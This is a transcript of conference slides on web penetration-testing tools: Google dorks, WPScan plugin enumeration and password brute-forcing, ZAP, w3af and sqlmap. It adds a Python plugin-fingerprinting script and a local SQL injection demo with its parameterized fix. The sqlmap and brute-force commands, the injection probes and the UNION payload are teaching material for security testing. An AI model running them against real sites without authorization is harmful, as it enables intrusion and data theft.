I want to be a hacker... but I only look good in a white hat

Lightning Uncon talk at Dutch PHP Conference 2015

Jakub Gadkowski

June 27, 2015
Transcript

  1. GOOGLE
     • Data mining:
       site:target.com filetype:doc
     • SQL injection / database identification (this query finds pages that echo a raw MySQL driver error back to the visitor):
       site:target.com "supplied argument is not a valid MySQL"
     • For more such queries, check the Google Hacking Database hosted on Exploit Database:
       https://www.exploit-db.com/
  2. WPSCAN
     First of all, update the WPScan vulnerability database (may require `sudo` on Ubuntu):
       wpscan --update
     Quick scan, only enumerating vulnerable plugins:
       wpscan -u domaintocheck.com -e vp
  3. WPSCAN
     Most popular plugins, with the plugin folder given (more accurate results when the site does not use the default wp-content/plugins/):
       wpscan -u domaintocheck.com -e p --wp-plugins-dir content/plugins/
     WPScan can also brute-force a login using a password dictionary (noisy, and only against targets you are authorized to test):
       wpscan -u domaintocheck.com --wordlist popularpass.txt --username admin
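The plugin directory and plugin names passed to `--wp-plugins-dir` and `-e p` above are usually visible in the page source before any active scan: WordPress themes and plugins load their assets from `<content-dir>/plugins/<slug>/...`. The following is an added example, not code from the talk or from WPScan, that extracts that information from a saved front page. The HTML is a constructed sample for a site whose content directory was renamed from `wp-content` to `content`, matching the slide; `domaintocheck.com` is the placeholder host from the slides.

```python
import re
from collections import Counter

# Constructed sample of a WordPress front page (as saved with e.g. `curl -s`),
# with a non-default content directory ("content" instead of "wp-content").
SAMPLE_HTML = """
<html><head>
<meta name="generator" content="WordPress 4.2.2" />
<link rel="stylesheet" href="https://domaintocheck.com/content/plugins/contact-form-7/includes/css/styles.css?ver=4.2" />
<link rel="stylesheet" href="https://domaintocheck.com/content/themes/twentyfifteen/style.css" />
<script src="https://domaintocheck.com/content/plugins/contact-form-7/includes/js/scripts.js?ver=4.2"></script>
<script src="/content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js"></script>
<script src="/content/plugins/wordpress-seo/js/wp-seo.js?ver=2.3"></script>
</head><body></body></html>
"""

# Any href/src whose path contains "<one segment>/plugins/<slug>/".
# "dir" is the plugins directory relative to the web root, "slug" the plugin folder.
PLUGIN_REF = re.compile(
    r'(?:href|src)=["\'][^"\']*?/(?P<dir>[^"\'/]+/plugins)/(?P<slug>[^"\'/?#]+)/',
    re.IGNORECASE,
)
# The generator meta tag leaks the core version unless the theme removes it.
GENERATOR = re.compile(
    r'<meta\s+name=["\']generator["\']\s+content=["\']WordPress\s+([\d.]+)',
    re.IGNORECASE,
)


def find_plugin_dir(html):
    """Most frequently referenced plugins directory, e.g. 'wp-content/plugins',
    or None if the page references no plugin assets at all."""
    dirs = Counter(m.group("dir") for m in PLUGIN_REF.finditer(html))
    if not dirs:
        return None
    return dirs.most_common(1)[0][0]


def find_plugin_slugs(html):
    """Sorted, de-duplicated plugin folder names referenced by the page."""
    return sorted({m.group("slug") for m in PLUGIN_REF.finditer(html)})


def wordpress_version(html):
    """Core version from the generator meta tag, or None if it was removed."""
    m = GENERATOR.search(html)
    return m.group(1) if m else None


if __name__ == "__main__":
    plugin_dir = find_plugin_dir(SAMPLE_HTML)
    print("WordPress version:", wordpress_version(SAMPLE_HTML))
    print("plugins dir:      ", plugin_dir)
    print("plugins seen:     ", ", ".join(find_plugin_slugs(SAMPLE_HTML)))
    if plugin_dir:
        print("wpscan hint: --wp-plugins-dir", plugin_dir + "/")
```

Only plugins that enqueue front-end assets show up this way, so this is a lower bound; the directory it reports is what you feed to `--wp-plugins-dir`, and the slugs tell you which entries of the WPScan plugin list to look at first.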
  4. ZAP PROXY QUICK SCAN
     • It might be a good idea to persist your session for future reference.
     • Be sure you have plenty of memory and disk space, as these sessions can grow quite large (200 to 500 MB is typical).
  5. ZAP PROXY QUICK SCAN
     • Fill in the “URL to attack” field with your target address.
     • Press “Attack”.
  6. W3AF QUICK SCAN
     • The BackBox version does not work out of the box; you need to update it manually.
  7. W3AF QUICK SCAN
     • First select a scan profile (e.g. OWASP Top 10).
     • Put the address in the “Target” field.
     • Press “Start”.
  8. SQLMAP
     Once you have a suspect parameter for injection:
       sqlmap -u "http://domaintocheck.com/search?search=1" --threads=3 --risk=2 --level=2
     (--level raises the number of payloads and injection points tested, --risk enables more aggressive payloads; both default to 1.)
     If you know your target platform (say MySQL) and only want table names, you can speed up the process:
       sqlmap -u "http://domaintocheck.com/search?search=1" --threads=3 --risk=2 --level=2 --tables --dbms=MySQL
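What makes `search` a "suspect parameter", and why the Google dork on slide 1 works, both come down to the same code smell: user input concatenated into SQL and the driver's error echoed back. The following is an added example, not code from the talk or from sqlmap. It stands in for the `search` endpoint with an in-memory SQLite table (the real target would be MySQL behind `http://domaintocheck.com/search?search=...`, a placeholder from the slides), shows the vulnerable handler beside its parameterized fix, and runs the two first checks sqlmap performs against a parameter: a stray quote that should produce a database error, and a boolean pair (`AND 1=1` / `AND 1=2`) whose responses should differ only if the input reaches the query.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the target database: one table with a column
    the application never means to expose."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO products (name, secret) VALUES (?, ?)",
        [("widget", "s1"), ("gadget", "s2"), ("gizmo", "s3")],
    )
    return conn


def search_vulnerable(conn, search):
    """The anti-pattern sqlmap looks for: the query string parameter is pasted
    straight into the SQL, and the driver error is echoed to the client. That
    echoed error is exactly what the site: "... is not a valid MySQL" dork finds."""
    sql = "SELECT name FROM products WHERE id = " + search
    try:
        return {"status": 200, "rows": [r[0] for r in conn.execute(sql)]}
    except sqlite3.Error as e:
        return {"status": 500, "rows": [], "error": str(e)}


def search_fixed(conn, search):
    """Hardened handler: validate the type, bind the value, never echo driver errors."""
    try:
        product_id = int(search)
    except ValueError:
        return {"status": 400, "rows": []}
    rows = conn.execute("SELECT name FROM products WHERE id = ?", (product_id,)).fetchall()
    return {"status": 200, "rows": [r[0] for r in rows]}


def probe_parameter(endpoint, base_value="1"):
    """Minimal version of sqlmap's first two heuristics for one parameter.
    `endpoint` is a callable taking the parameter value and returning the
    response dict; in a real test it would perform the HTTP request."""
    baseline = endpoint(base_value)
    quote = endpoint(base_value + "'")               # syntax error if injected
    true_case = endpoint(base_value + " AND 1=1")    # should equal baseline
    false_case = endpoint(base_value + " AND 1=2")   # should differ from baseline
    return {
        "error_based": quote["status"] == 500 and "error" in quote,
        "boolean_based": (
            true_case["rows"] == baseline["rows"]
            and false_case["rows"] != baseline["rows"]
        ),
    }


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", probe_parameter(lambda v: search_vulnerable(conn, v)))
    print("fixed:     ", probe_parameter(lambda v: search_fixed(conn, v)))
    # Once the parameter is confirmed, a UNION payload does what `--dump` automates:
    print("leaked:    ", search_vulnerable(conn, "0 UNION SELECT secret FROM products")["rows"])
```

Against the vulnerable handler both heuristics fire, and the UNION payload returns the `secret` column; against the fixed handler the quote yields a plain 400 with no database error and the boolean pair collapses to identical responses, so sqlmap would report the parameter as not injectable. Type validation plus bound parameters is the fix; hiding the error message alone only defeats the Google dork, not the boolean-based check.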